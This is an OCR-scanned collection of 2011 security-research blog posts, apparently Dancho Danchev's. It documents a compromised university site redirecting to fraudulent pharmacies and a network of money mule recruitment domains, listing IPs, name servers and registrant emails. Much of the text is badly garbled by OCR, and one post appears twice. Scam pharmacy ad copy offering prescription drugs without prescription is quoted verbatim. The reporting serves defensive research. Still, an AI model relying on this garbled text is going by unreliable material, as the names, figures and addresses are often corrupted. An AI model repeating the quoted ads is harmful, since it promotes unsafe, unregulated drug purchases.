ZeuS crimeware variant targets Symbian and 


Dasael Kennedy 
BlackBerry users 


About Zero Dey A ZeuS crmeware variant known as ZeuS Mimo, has began targeting @ ZDNet's White Paper Mteabership 

7 the two-factor athenbcaton schubon offered by the Pobsh ING bark Newsletter: Stay Corre wth ote fees 
Staying on tep of the and updetes from White Pepers 

latest in - . . ° 

siaraiidunt The country of Facebook recognizes civil unions @ ZDNet's Must-Read News Alerts: 


secunty research Bresiong IT news as @ happens 
security research, 


vullner abdities The 600 mulhon user soaal networtung behemoth made a smal change 
threats and computer = to. &s ‘Relatx 


stup Status’ drop down box, and m downg £0 recognized 


attacks In 2 cv ureon’ and ‘In 
Microsoft confirms Windows BROWSER protocol Penkexonkucebook.  £ 
zero-day Follow us on Twitter t 
Warteh ws on YouTube & 


A security researcher has released proot-of comet code for an 
weowched searty vulmerabaity affecting afl versions of Windows 
Crometing a warreng from Mxrosoft that remote code execution 


Blogs From Our Sponsors 
Raene Andrnid anne lead ta malware 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for February. You can 
subscribe to my [2]personal RSS feed, [3]Zero Day’s main feed, or follow me on Twitter: 
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[4] 


Recommend reading: 


¢ [5]500,000 stolen email passwords discovered in Waledac’s cache 
¢ [6]Report: AV users still get infected with malware 


¢ [7]Report: Patched vulnerabilities remain prime exploitation vector 


01. [8]Researcher demos SMS-based smartphone botnet 

02. [9]500,000 stolen email passwords discovered in Waledac’s cache 

03. [10]Study: US tops ZeuS hosting infrastructure chart 

04. [11]Spamvertised Xerox document themed malware campaign spreading 
05. [12]New report details the prices within the cybercrime market 

06. [13]Report: AV users still get infected with malware 

07. [14]Microsoft disables AutoRun on Windows XP/Vista to prevent malware infections 
08. [15]Google intros advanced sign-in feature 

09. [16]Malware Watch: UPS/FDIC; Mobile app; Infected ambulance dispatch 
10. [17]Report: Patched vulnerabilities remain prime exploitation vector 

11. [18]Bogus Android apps lead to malware 

12. [19]ZeuS crimeware variant targets Symbian and BlackBerry users 

13. [20]Researchers spot new Mac OS X malware 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him 
[22]Jon Twitter. 


1. https: //1h5.googleusercontent .com/-n-0Z7kPS_XE/TWup2Vp4HjI/AAAAAAAAE1k/cvb-TliEwfM/s1600/ZDNet_Zero_Day_Fe 


bruary_2011.png 


ttp://www.zdnet .com/topics/dancho+danchev?o=1émode=rssktag=mantle_skin; content 


. http: //feeds.feedburner.com/zdnet/securit 
. http://twitter.com/danchodanche 


ttp://www.zdnet .com/blog/security/500000-stolen-email-passwords-discovered-in-waledacs-cache/804 


ttp://www.zdnet.com/blog/security/report-av-users-still-get-infected-with-malware/8108 


ttp://www.zdnet .com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162 


ttp://www.zdnet.com/blog/security/researcher-demos- sms-based-smartphone-botnet/8031 


ttp://www.zdnet .com/blog/security/500000-stolen-email-passwords-discovered-in-waledacs-cache/804 


PC oOnNaAnRWN 


ttp://www.zdnet .com/blog/security/study-us-tops-zeus-hosting-infrastructure-chart/8064 


ttp://www.zdnet .com/blog/security/spamvertised-xerox-document-themed-malware-campaign-spreading/807 


ttp://www.zdnet .com/blog/security/new-report-details-the-prices-within-the-cybercrime-market/8078 
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. http: //www.zdnet.com/blog/security/report-av-users-still-get-infected-with-malware/8108 


ttp://www.zdnet .com/blog/security/microsoft-disables-autorun-on-windows-xpvista-to-prevent-malware-inf 


ections/812 


. http: //www.zdnet.com/blog/security/google-intros-advanced-sign-in-feature/813 
. http: //www.zdnet .com/blog/security/malware-watch-upsfdic-mobile-app-infected-ambulance-dispatch/8151 


. http: //www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162 


18. http: //www.zdnet.com/blog/security/bogus-android-apps-lead-to-malware/8212 


. http: //www.zdnet.com/blog/security/zeus- crimeware-variant-targets-symbian-and-blackberry-users/8231 


20. http://www.zdnet .com/blog/security/researchers-spot-new-mac-os-x-malware/8241 
21. http://ddanchev.blogspot.com/ 
22. http://twitter.com/danchodanche 


7.3 March 


7.3.1 Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceu- 
tical Ads (2011-03-07 14:08) 


[1] 
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Google health 


@ £- 
Viagra 


SALE: Viagra Levitra Cialis 


SALE: Viagra $0.80 per pill; Levitra $2.00 per pill; Cialis $1.30 per pill; 
Accept payments: Visa, MasterCard, Westem Union, Money Gram, 
EuroDebit, Bank wire transfer. We have a special discount program for our 
customers! Please check our bonus options. 


http://www. generic-pills-online. eu/ 


Buy Viagra Now From & Get 10 bonus pills 
FREE! 


Viagra is the top brand to treat erectile dysfunction. Buy through a 
recommended online pharmacy to get efficient service at bargain prices. Bu 
generic Viagra online with confidence and secunty 


http://www.worldselectshop.com/ 


Buy Viagra, Cialis, Levitra - Cheap Generic 
Cialis Online Without Prescription 


Generic Cialis Online Pharmacy Buy Cialis online without a prescription. 10 
Free Viagra Pills. Order cheap Cialis plus many other generic Cialis erectile 
dysfunction drugs. Lowest prices and Satisfaction Guaranteed 


http://www. canadianselect.net/ 


Generic VIAGRA 120 pills x 100mg $137.95 


High quality Generic Viagra. 100% Satisfaction Guaranteed. Fast wordwide 
shipping. 10 Free Bonus Viagra Pills with your order! Visa, MC, Amex 
accepted. 5-7% reorder discount on all orders. 


http://www.ukmenshealth.com 


An exploited web application vulnerability within Cochise County Online University CMS 
(moodle.cochise.az.gov/user), is currently resulting in a blackhat SEO campaign (1,890 pages) 
leading to fraudulent Google brand-jacked pharmaceutical pages. 


Naturally, once the compromise took place, the cybercriminals started considering the 
blackhat SEO content farm themed for pharmaceutical scams, as parts of their infrastructure 
and spamvertised links to it across multiple web forums. 


[2] 
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Ther redirection chain is as follows: 

- moodle.cochise.az.gov/user - random pharmaceutical content 
- goodmedk.com 

- googpilly.com 

- 50.22.28.50 


goodmedk.com/whftityixallwke6hoqstgzsiq.html - 77.67.80.48, AS3257 - 


clalis benefits: 7 cialis benefits OF soma dan nolvadex OF shelf fe of xanax oF [urlehttp://www hvmacnet/sports/2009-201 
datera somos: 6 datore somas OF adipex » comsules Or [urlehittp://www heaplace com/johertermine 37.5 


hello ilove your valiem wri: 7 helio | love vou vabum url OF generic visare trom indies oF [urlehittp://wew heaplace.com/r9/i 


adipex deliverd 24 heurs: 6 adicex debverd 24 hours OF adinex adipex chertermine stipes OF xiaore women 2006 OF 
cheap viagra fast delivery: 2 cheap visara fast delivery OF off shore visors or [url~?ittp://www tiwmac.net/menbders/berkeley/Jadpex secure 


phentermine and online sales: 6 chentermine and online sales OF cheapest adipex mth no prescription ankne of [uriehitp://www hme 


soma 32c 7 soma 326 OF viare rrp australis or (urlehtto://www.wallacegalieries com/index pho/component/option.com_gatlery/id,7S/task,cv/}cialis onset 


xanax bars eg: 6 xanax bars 2ma OF mbat is valiuen weed te treat OF same orescriotion no ce OF (uriehttn-//www.cperabak 
Calis dosage splitting pills: 7 cialis dosaor splitting oils OF what do aenenc valum look like Or (urlehttp://www heaplace com/vid/index pho/gratuk-corps ja 


xanax with other drugs: 6 xanax wih her deuat OF extended releate tramadol abuse of OF tramadel bres 
xanax helping with opiate withdrawl: 7 canox beloing reth opiate withdran! OF xanax in urine screens OF [urleFatp://www operabattycka pl/tep/statut htmijadpex phentermine without a pres 
Calis commercial actress: 6 cabs commercial actress OF is shemermine least in the uk OF (urlehttp://sicolab.ceg/blog *riint=6 value prescribe 
vellum messageboard: P eputiuesaushvadd OF Lue gnc ath onurs OF weugace stag aod caus €¢ [or 


sonsa mexico 6 or 


or (url=hetp://www .oldchurch. 


cheap phontarmine ne physicias: 7 chess cherkerming no phrsiian OF side effects prozac phentermine OF ciahs comparsons OF 


everyday cialis cost: 6 everyday cals cost OF scons achive marediens or [urtehttp://www.wallacegalienes.com/index.php/co 
low priced viagra chain store: 7 lor sriced vinara chain store OF carisonradel carisonrodel muscle relaxant soma OF (urlehttp://www. 


lent soma scale: 6 lent soma scale OF phentermine dist pif message beard OF rellow xanax hme released OF 
viogre afghanistan: 7 vars afahorestan oF teaiadwe2 gud ecole ue OF dreads eta ted or (urtehttaciiwww hesplace. com/vid/index.php 
of (url#hatp://www cldchurch. 


ntermine weight loss ex : 6 or 


heme made clelis: 6 home made cialis OF cals discount canada mexico Or beecandadmes ce 
drug test results to adipex: 2 dean tetheeeuta a OF slab itis detaes ene sanas Of [utchep few pest netimembe:: (ber ate 
cialis 20 mg prices: 7 cols 20 “4 OF rs r bh pheats 


purchasing xanax online with online dector: 7 purchasing xanax online with online doctor OF 9 cheap some on oF [urlehttp://sicolab .org/blogs/forrmama?ntn 


Sfima tramadab Tramarini denrocann 


broownn@usa.com 


goodmedk.com/kavglmapejes7bdfg6mf8d.py 


goodmedk.com/hxinlaresbnzbikmnatmck.py 
goodmedk.com/huvtleikspann6hogqstgzsiq.html 
goodmedk.com/txajlatevOegij9pi-g.pl 

goodmedk.com/tldhlaoet8cegh7ng9e.html 
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Active Magra 
Web 
Viagra (Siigenafil) 100mg x 395 Py 12- Plus Free Shy 


Buy Viagsa (Sidenatf) 100mg From our CANADIAN Online Pharmacy (Since 2003) - No 
Prescription Required « Plus Free Shipping 
wow. alincabs.com + Cached « Similar 


i 
ciaks tramadol viagra valium 
pilisheathenedsplus. net - Cached - Similar 


Buy Viagra, Cialis, Levitra - Cheap Generic Cialis Online Without Prescription 
Genenc Cialis Onine Pharmacy Buy Cialis online wthout a presception. 10 Free Viagra Pills 
Order cheap Cialis plus many other generic Cialis erectiie dysfunction drugs. Lowest prices 
and Satisfaction Guaranteed 

www canadisnselect net - Cached - Similge 


E & 1 lis E 
Viagta it the top brand to treat erectie dysfunction. Buy through 4 recommended online 
pharmacy to get efficient semce at bargain prices. Buy genenc Viagra online wth confidence 
and securty 
www. woridselectshop.com + Cached - Srevlar 


SALE Viagra Levitra Cialis 

SALE: Viagra $0.90 per pil, Levitra $2.00 per pil, Ciakks $1.30 per pill Accept payments: 
Visa, MasterCard, Wester Union, Money Gram, EuroDebit, Bank wire transfer. We have a 
special discount peogram for our customers! Please check our bonus options. 

wow. generic-pils-online eu - Cached » Similar 


[3] 
| [Search } stusses semis 


Email: 


Results 1 - 10 of about 33,000,000 for viagra [gefertion| (021 seconds) 


Sponsored Links 


Viagra (Sildenafil) 100mg x 395 

Pills $312 - Plus Free Shipping 

Buy Viagta (Silsenaff) 100mg From our 
CANADIAN Onine Pharmacy (Since 2003) - No 
Prescription Required « Plus Free Shipping 
wrew alirstabs.com 


Cialis tramadol viagra 
im 

coals tramadol viagea vation 

paisheathmedsplus net 


Viagra, Cialis, Levitra - 
Cheap Genenc Cialis Onkne Without 
Pr 
Genenc Cialis Oniee Pharmacy Buy Cisks onkne 
without 2 geescription 10 Free Viagra 
Pills, Order cheap Cialis plus many other generic 
Caalis erectile dysfunction drugs. Lowest pices 
and Satesfaction Guararteed 
weew Canadianselect net 


Suy Viagra Now From & Get 10 
bonus pills FREE! 


jogn- 


Redirectors used: 
googpilly.com - 77.67.80.42, AS3257 - Email: jognbroownn@usa.com 
50.22.28.50/c.php - 50.22.28.50-static.reverse.softlayer.com 


[4] 
CANADIAN ALL PRODUCTS ABOUT HOWTOORDER TESTIMONIALS FAQ CONTACTS 


. = ee 
ws \ we Cialis + Viagra R= ree 
- Men's Power Charge 

Ne + cy — 
2 % + ce = s7hos 


OO \ See Ga Be a 
\\ Healthcare Online eh 


USD GBP CAD BUR AUD CHF Most Popular Products 


MENS HEALTH 


Viagra os low os $1.85 
Veg . ener Viagra. contareng Sddenafi Carate. enables many men with erectée dysfunction to 
Cols * achorve oe rect peris for sexual actntty Since becoming avails! agra he 
Viagra Super Active . been the prme treatment for erectibe Sytfuncbon 
Vigra Professional . 
levitra 
Cals Super Active+ . 
Viagra Super feece . Cialis as low as $1.75 
Order nom 
Cals Professional . memory knqwn as mpotence Recommended for use as needed. Ciatrs can also be used 
Viagra Soft Tabs 4 medheabon 
Prope 
Maxaman 
- Viagra Super Actives os low es $2.79 | Order nom | a 
Viagra Super Actwve represerts the fourth generabon of phosphodeesterase imhddors Th ane 
new herrulstion of 3 workd-+nown med abon prowdes even more powertul penis hood 
eam ane sien. ncsensed thamine end cenelthine 10 ttindation 
soma 
Tramadol 
Viagra Professional os bow os $3.85 dar aoa 
ANTIBIOTICS d&icube trating the natura xd tow, @ hon erated 
ocovery orice sexual weer nee do slosicel 
intheomax 
WOMEN'S HEALTH $2.50 
Levitra as bow as $2. 
Order now 
Female Pink Vaora . evtra 5 a new FDA-approved oral prescription meds abon for the treatmert of erectile 


Redirects to the following currently active fraudulent online pharmacies: 
pillshealthmedsplus.net - 89.114.9.82 - Email: acquit@bz3.ru 

alirxtabs.com - 91.212.135.69 - Email: rxrevenue@gmail.com 

canadianselect.net - 89.149.196.197 - Email: canadianselect.net@protecteddomainservic- 
es.com 

worldselectshop.com - 95.211.1.82 - Email: worldselectshop.com@protecteddomainservi- 
ces.com 

generic-pills-online.eu - 95.163.15.207 

menhealth-pharmacy.co.uk - 109.237.213.194 

4rx.com - 174.127.67.233 - Email: weobmaster@4rx.com 


The hijacking of a trusted brand such as Google shouldn’t be surprising, as it’s an insep- 


arable part of social engineering driven abuse of the trust-chain. From Google’s name to the 
visual impersonation of Google Search this campaign demonstrates exactly the same. 
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This post has been reproduced from [5]Dancho Danchev’s blog. Follow him 
[6Jon Twitter. 


as 
2. 
a: 
4. 
5. http: //ddanchev. blogspot .com/ 

6, http://evitter .con/danchodanchey 


7.3.2 Keeping Money Mule Recruiters on a Short Leash - Part Six (2011-03-10 14:45) 


[1] 


~ 


> Western Trust Solutions Pic. 


ert he meet dee Pen 
ieee renga Ft fering more beng ber he 
back 


+ 03.0%. 2007 - High Court Bounces Gey It 


+ 02.29. 2009 - Supreme Court Sates With 
an 


aces tows out Ruunctor order in long-nening 
caret bate Mae hence 


Following my previous post on "[2]Keeping Money Mule Recruiters on a Short Leash - Part 
Five", in this post we’re once again going to expose a portfolio of money mule recruitment 
domains, their related ASs and name servers of notice, including some additional SpyEye 
activity within one of the ASs. 
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What’s particularly interesting is the ongoing use of similar templates, including fake 
"certified by" documents aiming to boost the visitor’s confidence in the mule recruitment 
company. Sample "certified by" documents include: 


INTERNATIONA GLSINERS MACRENES 


Selling IBM cserver xSorics 
infrastracture Solutions 


Hoes CHOrWrmes That 


Hiwatch Investments Inc. 


[5] 
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Most Promising 
New Business 


Hiwatch Investments Inc. 


Si+ibecd — Sams 08 8 se 


THIS CERTIFIES THAT 


Hiwatch Investments Inc. 


[7] 


Money mule recruitment web sites: 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - [8]seen here 
ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info 
ARAMATEGROUP-INT.INFO - Email: admin@aramategroup-int.info 
art-marketllc.cc - Email: hear@ppmail.ru 

ARTSOLVE-LTD.AT - Email: admin@artsolve-ltd.at 
ARTSOLVELTD.CC - Email: admin@artsolveltd.cc 

artsolveltd.cc - Email: admin@artsolveltd.cc 
ARTSOLVELTDCO.AT - Email: admin@artsolveltd.cc 
artsolveltdco.at - Email: admin@artsolveltd.cc 
ASTECH-GROUPDE.CC - Email: admin@i-compass-group.cc 
atlant-groupinc.cc - Email: bombay@yourisp.ru - [9]seen here 
Atlant-usainc.net - Email: admin@atlant-usainc.net 
BREDGARCORP-ANT.BE 

CREATENCE-GROUPLLC.AT - Email: admin@creatence-groupllc.at 
CREATENCE-GROUPLLC.CC - Email: hunt@bz3.ru 
CREATENCEGROUP-LLC.CO - Email: px@bz3.ru 

DEVAS-LLC.CO - Email: gate@ppmail.ru 

DRYSDALE-ANTCORP.AT - Email: admin@drysdale-antcorp.at 
DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale-antcorp.biz 
DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru 
DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale-antcorp.biz 
FINTEC-UKLTD.WS 

fintec-uklitd.ws 

fourthgroup-lItd.cc - Email: rots@cheapbox.ru 
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generalabbrialgroup-ltd.net - Email: admin@generalabbrialgroup-ltd.net 
generation-groupltd.cc - Email: jz@ppmail.ru 
I-COMPASS-GROUP.AT - Email: admin@i-compass-group.at 
katemdutkins.co.cc 

LILAC-GROUPLLC.CC - Email: lane@free-id.ru 
LILACGROUP-LLC.CO - Email: baggy@bz3.ru 
MIMOSA-INCGROUP.INFO - Email: admin@mimosa-incgroup.info 
moneyvisual-ukllc.com - Email: admin@moneyvisual-ukllc.com 
nimroditd-uk.net - Email: admin@nimrodltd-uk.net 
OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net 
qead-groupllc.net - Email: admin@qead-groupllc.net 
RENAISSANCELLC.BE 

renaissancellc.be 

renaissance-llc.cc - Email: admin@renaissance-llc.cc 
ROYALTHELMAS-GROUP-LLC.CC - Email: zap@ca4.ru 


ROYALTHELMAS-TEAMANT.ASIA - Email: admin@royalthelmas-teamant.asia 
SCHWARTZBROTHERSANT-CORP.COM - Email: admin@schwartzbrothersant-corp.com 


STRATEGICGROUP-LLC.CO - Email: flute@free-id.ru 
THRONE-GROUPLLC.CC - Email: lane@free-id.ru 
THRONEGROUP-LLC.CO - Email: floyd@ca4.ru 
THRONE-UK.AT - Email: admin@throne-uk.at 


TINASSANSERVICEANT-ANTTEAM.NET - Email: admin@tinassanserviceant-antteam.net 


TINASSANSERVICE-GROUPLLC.CC - Email: six@yourisp.ru 
westerntrust.co.uk 
westview-art.net - Email: admin@westview-art.net 


[10] 
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aimicgroup-lic.co 


gleichfalls-group.cc 


lbm-groupinc.com 


mimosa-inegroup.com 


mx aimicgroup-tle.co 


98.141.220.0/24 ——_-_———__———AS gy 4529713 


mx. arphisgoldgroup-inc.co 


98.141.220,.116 


mx gleichtalls-group.cc 98-141-220-116 reliablehostingservices net 


mxitbm-groupine.com 
mx.feign-grouporg.cc 

mx.stilegroup-iic.co 
mx. usgroup-amina.co 


stilegroup-lic.co 


Domains responding to: 

78.46.105.205 - AS24940, HETZNER-AS Hetzner Online AG RZ 
98.141.220.116 - AS29713, INTERPLEXINC Interplex LLC. 
98.141.220.117 - AS29713, INTERPLEXINC Interplex LLC. 
114.207.244.143 - AS9318, HANARO-AS Hanaro Telecom Inc. 
114.207.244.144 - AS9318, HANARO-AS Hanaro Telecom Inc. 
114.207.244.145 - AS9318, HANARO-AS Hanaro Telecom Inc. 
114.207.244.146 - AS9318, HANARO-AS Hanaro Telecom Inc. 
193.105.134.230 - AS42708, PORTLANE Network 
193.105.134.231 - AS42708, PORTLANE Network 
193.105.134.232 - AS42708, PORTLANE Network 
193.105.134.233 - AS42708, PORTLANE Network 
193.105.134.234 - AS42708, PORTLANE Network 
195.182.57.84 - AS47311, Cerannics-AS Cerannics Ilp 
195.182.57.91 - AS47311, Cerannics-AS Cerannics Ilp 
204.45.118.54 - 204.45.118.48/29/INSIGHT-INVESTMENTS-LLC 


More malicious activity within [11J]AS24940, HETZNER-AS Hetzner Online AG RZ, cour- 
tesy of the SpyEye tracker: 

188.40.198.185 

188.40.87.88 

www.privathosting.eu 

spl.privathosting.eu 

46.4.194.162 

188.40.87.91 

88.198.36.61 
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[12] 


* Yayoi Kusama - whose w 


‘ and shows some attributes 


surrealism, Art Brut, pop : 
and is infused with autobic 


sexual content 


x 
What We Do Services Overview About us 
Se 
Ne ”@ DF 
Sudene 5: vest 
Provide 4 
Welcome to ArtSolve Ltd Authorization 


Regestrabon Forgot password? 


Latest projects 


B Pyow Betenoa (Rassian 1938-1991) . Uneted 

B cae stver and meto Cigarette cases 

@ Easter thedey of four Spring Westng Dots 

B® Joan Dubutiet (1901-1985) . Le Bateau t 

WS Gout Mother Bear Wooden Carving 12°x8.5* 

BB Viaderw Nkoizevich Nerukten (Res sian 1925) “The 


B® Swess Rebever Nesting Dot Spce~ 
Bic Tia (> 1999) . L'Atower 
B MANOLO VALDeS (B. 1942). LACARTA 


Name servers of notice: 

nsl.uknamo.com - 69.10.44.188 - Email: morph@ppmail.ru 

ns2.uknamo.com - 178.162.181.11 

ns3.uknamo.com - 66.199.236.116 

nsl.ukansnami.com - 178.162.181.11 - Email: glide@yourisp.ru 
ns2.ukansnami.com - 178.162.181.11 

ns3.ukansnami.com - 66.199.236.117 

ns3.dnsukrect.com - 66.199.236.118 - Email: code@yourisp.ru 
NS1.LIBUNITAU.CC - 178.162.152.76 - Email: ached@yourisp.ru - [13]seen here 
NS2.LIBUNITAU.CC - 66.199.236.115 

NS3.LIBUNITAU.CC - 178.162.181.11 

NS1.AUSTDEC.CC - 178.162.152.75 - Email: bold@yourisp.ru - [14]seen here 
NS2.AUSTDEC.CC - 66.199.236.114 

NS3.AUSTDEC.CC - 178.162.181.11 

NS1.SURPLUSUSA.CC - 209.159.156.162 - Email: skulk@ppmail.ru - [15]seen here 
NS2.SURPLUSUSA.CC - 76.73.47.26 

NS3.SURPLUSUSA.CC - 69.50.192.97 

NS1.USABONDS.CC - Email: bart@cheapbox.ru - [16]seen here 
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NS2.USABONDS.CC 
NS3.USABONDS.CC 


The cybercriminals have also switched from using unique emails for registrations to de- 
fault admin@money-mule-recruitment domain type of structure. Monitoring of their money 
mule recruitment activities is ongoing. 


Related posts: 

[17]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[18]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[19]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[20]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[21]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[22]Money Mule Recruiters on Yahoo!’s Web Hosting 

[23]Dissecting an Ongoing Money Mule Recruitment Campaign 
[24]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[25]Keeping Reshipping Mule Recruiters on a Short Leash 
[26]Keeping Money Mule Recruiters on a Short Leash 
[27]Standardizing the Money Mule Recruitment Process 

[28]Inside a Money Laundering Group’s Spamming Operations 
[29]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
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7.3.3 Keeping Money Mule Recruiters on a Short Leash - Part Six (2011-03-10 14:45) 


[1] 
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Following my previous post on "[2]Keeping Money Mule Recruiters on a Short Leash - 
Part Five", in this post we’re once again going to expose a portfolio of money mule recruit- 
ment domains, their related ASs and name servers of notice, including some additional SpyEye 
activity within one of the ASs. 
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What’s particularly interesting is the ongoing use of similar templates, including fake 
"certified by" documents aiming to boost the visitor’s confidence in the mule recruitment 
company. Sample "certified by" documents include: 


INTERNATIONAL BUSINESS MAC BEES: 


Selling IBM cserver xSeries 
infrastructure Solutions 
‘oes CEOTIOUES Theat 
Hiwatch Investments Inc. 


ABS TORE PETC, 


wecee 28.08.2006 yo 18.08.2000 


[3] aS 
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[5] 


THE 
AWARDS 


Most Promising 
New Business 


Hiwatch Investments Inc. 


Meares at Tee Portaemandty bh SeMe® Cart 
Hamgere Chamber of Commerce © wututtry 


Highly Commended 


[6] 


THIS CERTIFIES THAT 
Hiwatch Investments Inc. 


FROM 25,07,2006 TO 25,07,2012 
Regsstrer of Weatern Unon cee, ame © 


Money mule recruitment web sites: 


[7] 
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ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - [8]seen here 
ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info 
ARAMATEGROUP-INT.INFO - Email: admin@aramategroup-int.info 
art-marketllc.cc - Email: hear@ppmail.ru 

ARTSOLVE-LTD.AT - Email: admin@artsolve-ltd.at 
ARTSOLVELTD.CC - Email: admin@artsolveltd.cc 

artsolveltd.cc - Email: admin@artsolveltd.cc 
ARTSOLVELTDCO.AT - Email: admin@artsolveltd.cc 
artsolveltdco.at - Email: admin@artsolveltd.cc 
ASTECH-GROUPDE.CC - Email: admin@i-compass-group.cc 
atlant-groupinc.cc - Email: bombay@yourisp.ru - [9]seen here 
Atlant-usainc.net - Email: admin@atlant-usainc.net 
BREDGARCORP-ANT.BE 

CREATENCE-GROUPLLC.AT - Email: admin@creatence-groupllc.at 
CREATENCE-GROUPLLC.CC - Email: hunt@bz3.ru 
CREATENCEGROUP-LLC.CO - Email: px@bz3.ru 

DEVAS-LLC.CO - Email: gate@ppmail.ru 

DRYSDALE-ANTCORP.AT - Email: admin@drysdale-antcorp.at 
DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale-antcorp.biz 
DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru 
DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale-antcorp. biz 
FINTEC-UKLTD.WS 

fintec-ukitd.ws 

fourthgroup-Itd.cc - Email: rots@cheapbox.ru 


generalabbrialgroup-ltd.net - Email: admin@generalabbrialgroup-lItd.net 
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generation-groupltd.cc - Email: jz@ppmail.ru 

I-COMPASS-GROUP.AT - Email: admin@i-compass-group.at 
katemdutkins.co.cc 

LILAC-GROUPLLC.CC - Email: lane@free-id.ru 

LILACGROUP-LLC.CO - Email: baggy@bz3.ru 

MIMOSA-INCGROUP.INFO - Email: admin@mimosa-incgroup.info 
moneyvisual-uklic.com - Email: admin@moneyvisual-ukllc.com 
nimroditd-uk.net - Email: admin@nimrodltd-uk.net 

OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net 
qead-groupllc.net - Email: admin@qead-groupllc.net 

RENAISSANCELLC.BE 

renaissancellc.be 

renaissance-llc.cc - Email: admin@renaissance-llc.cc 
ROYALTHELMAS-GROUP-LLC.CC - Email: zap@ca4.ru 
ROYALTHELMAS-TEAMANT.ASIA - Email: admin@royalthelmas-teamant.asia 
SCHWARTZBROTHERSANT-CORP.COM - Email: admin@schwartzbrothersant-corp.com 
STRATEGICGROUP-LLC.CO - Email: flute@free-id.ru 

THRONE-GROUPLLC.CC - Email: lane@free-id.ru 

THRONEGROUP-LLC.CO - Email: floyd@ca4.ru 

THRONE-UK.AT - Email: admin@throne-uk.at 
TINASSANSERVICEANT-ANTTEAM.NET - Email: admin@tinassanserviceant-antteam.net 
TINASSANSERVICE-GROUPLLC.CC - Email: six@yourisp.ru 
westerntrust.co.uk 


westview-art.net - Email: admin@westview-art.net 
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[10] 


aimicgroup-lic.co 


gleichfalls-group.cc 
lbm-groupinc.com 
mimosa-inegroup.com 
mx aimicgroup-tl¢e.co 


AS 
mx. arphisgoldgroup-ine.co 98.141.220.024 ——_—_—— > AS29713 


* 
98.141.220.116 
98-141-220-116 reliablehostingservices. net 


mx gleichtalls-group,cc 
maxibm-groupine.com 
mx.reign-grouporg.cc 

mx. stilegroup-lic.co 


mx. usgroup-amina.co 


stilegroup-lic.co 


Domains responding to: 

78.46.105.205 - AS24940, HETZNER-AS Hetzner Online AG RZ 
98.141.220.116 - AS29713, INTERPLEXINC Interplex LLC. 
98.141.220.117 - AS29713, INTERPLEXINC Interplex LLC. 
114.207.244.143 - AS9318, HANARO-AS Hanaro Telecom Inc. 
114.207.244.144 - AS9318, HANARO-AS Hanaro Telecom Inc. 
114.207.244.145 - AS9318, HANARO-AS Hanaro Telecom Inc. 
114.207.244.146 - AS9318, HANARO-AS Hanaro Telecom Inc. 
193.105.134.230 - AS42708, PORTLANE Network 


193.105.134.231 - AS42708, PORTLANE Network 


3664 


193.105.134.232 - AS42708, PORTLANE Network 
193.105.134.233 - AS42708, PORTLANE Network 
193.105.134.234 - AS42708, PORTLANE Network 
195.182.57.84 - AS47311, Cerannics-AS Cerannics Ilp 
195.182.57.91 - AS47311, Cerannics-AS Cerannics Ilp 


204.45.118.54 - 204.45.118.48/29/INSIGHT-INVESTMENTS-LLC 


More malicious activity within [11]AS24940, HETZNER-AS Hetzner Online AG RZ, cour- 
tesy of the SpyEye tracker: 


188.40.198.185 
188.40.87.88 
www.privathosting.eu 
spl.privathosting.eu 
46.4.194.162 
188.40.87.91 


88.198.36.61 


[12] 
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Yayoi Kusama - whose w 
and shows some attributes 
surrealism, Art Brut, pop : 
and is infused with autobic 


sexual content. 


3 
What We Do Services Overview About us 
© Search for tatest in art work 
© Negotste the Dest possible price 
@ Sutere specail buyers requests 
© Provide 100% Guarantee 
Welcome to ArtSolve Ltd Authorization 


Password * | Loge | 


Regstrabon forgot password? 
Latest projects 
B Pyotr Betenca (Russian 138.1091) . Unewed 
B Four sever and meso Cigarette cases 
B® Easter thedey of four Spring testing Dots 
B Joan Dubutiet (1901.1985) - Le Bateau t 
Good Mother Bear Wooden Carving 12°x8.5~ 
@ Viadw Mkotaevich Nermukhin (Rapsian, 1925) . "The 
tatoer (Primup) 
B 2 wotres rrory caveet 
@ Seress Retewer Nesting Oot Spce~ 


B® Gecepes Terrien (>, 1939) . L'Ateter 
@ MANOLO VALDeS (B. 1942). LA CARTA 


Name servers of notice: 

nsl.uknamo.com - 69.10.44.188 - Email: morph@ppmail.ru 

ns2.uknamo.com - 178.162.181.11 

ns3.uknamo.com - 66.199.236.116 

nsl.ukansnami.com - 178.162.181.11 - Email: glide@yourisp.ru 
ns2.ukansnami.com - 178.162.181.11 

ns3.ukansnami.com - 66.199.236.117 

ns3.dnsukrect.com - 66.199.236.118 - Email: code@yourisp.ru 
NS1.LIBUNITAU.CC - 178.162.152.76 - Email: ached@yourisp.ru - [13]seen here 


NS2.LIBUNITAU.CC - 66.199.236.115 
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NS3.LIBUNITAU.CC - 178.162.181.11 

NS1.AUSTDEC.CC - 178.162.152.75 - Email: bold@yourisp.ru - [14]seen here 
NS2.AUSTDEC.CC - 66.199.236.114 

NS3.AUSTDEC.CC - 178.162.181.11 

NS1.SURPLUSUSA.CC - 209.159.156.162 - Email: skulk@ppmail.ru - [15]seen here 
NS2.SURPLUSUSA.CC - 76.73.47.26 

NS3.SURPLUSUSA.CC - 69.50.192.97 

NS1.USABONDS.CC - Email: bart@cheapbox.ru - [16]seen here 
NS2,.USABONDS.CC 


NS3.USABONDS.CC 


The cybercriminals have also switched from using unique emails for registrations to de- 
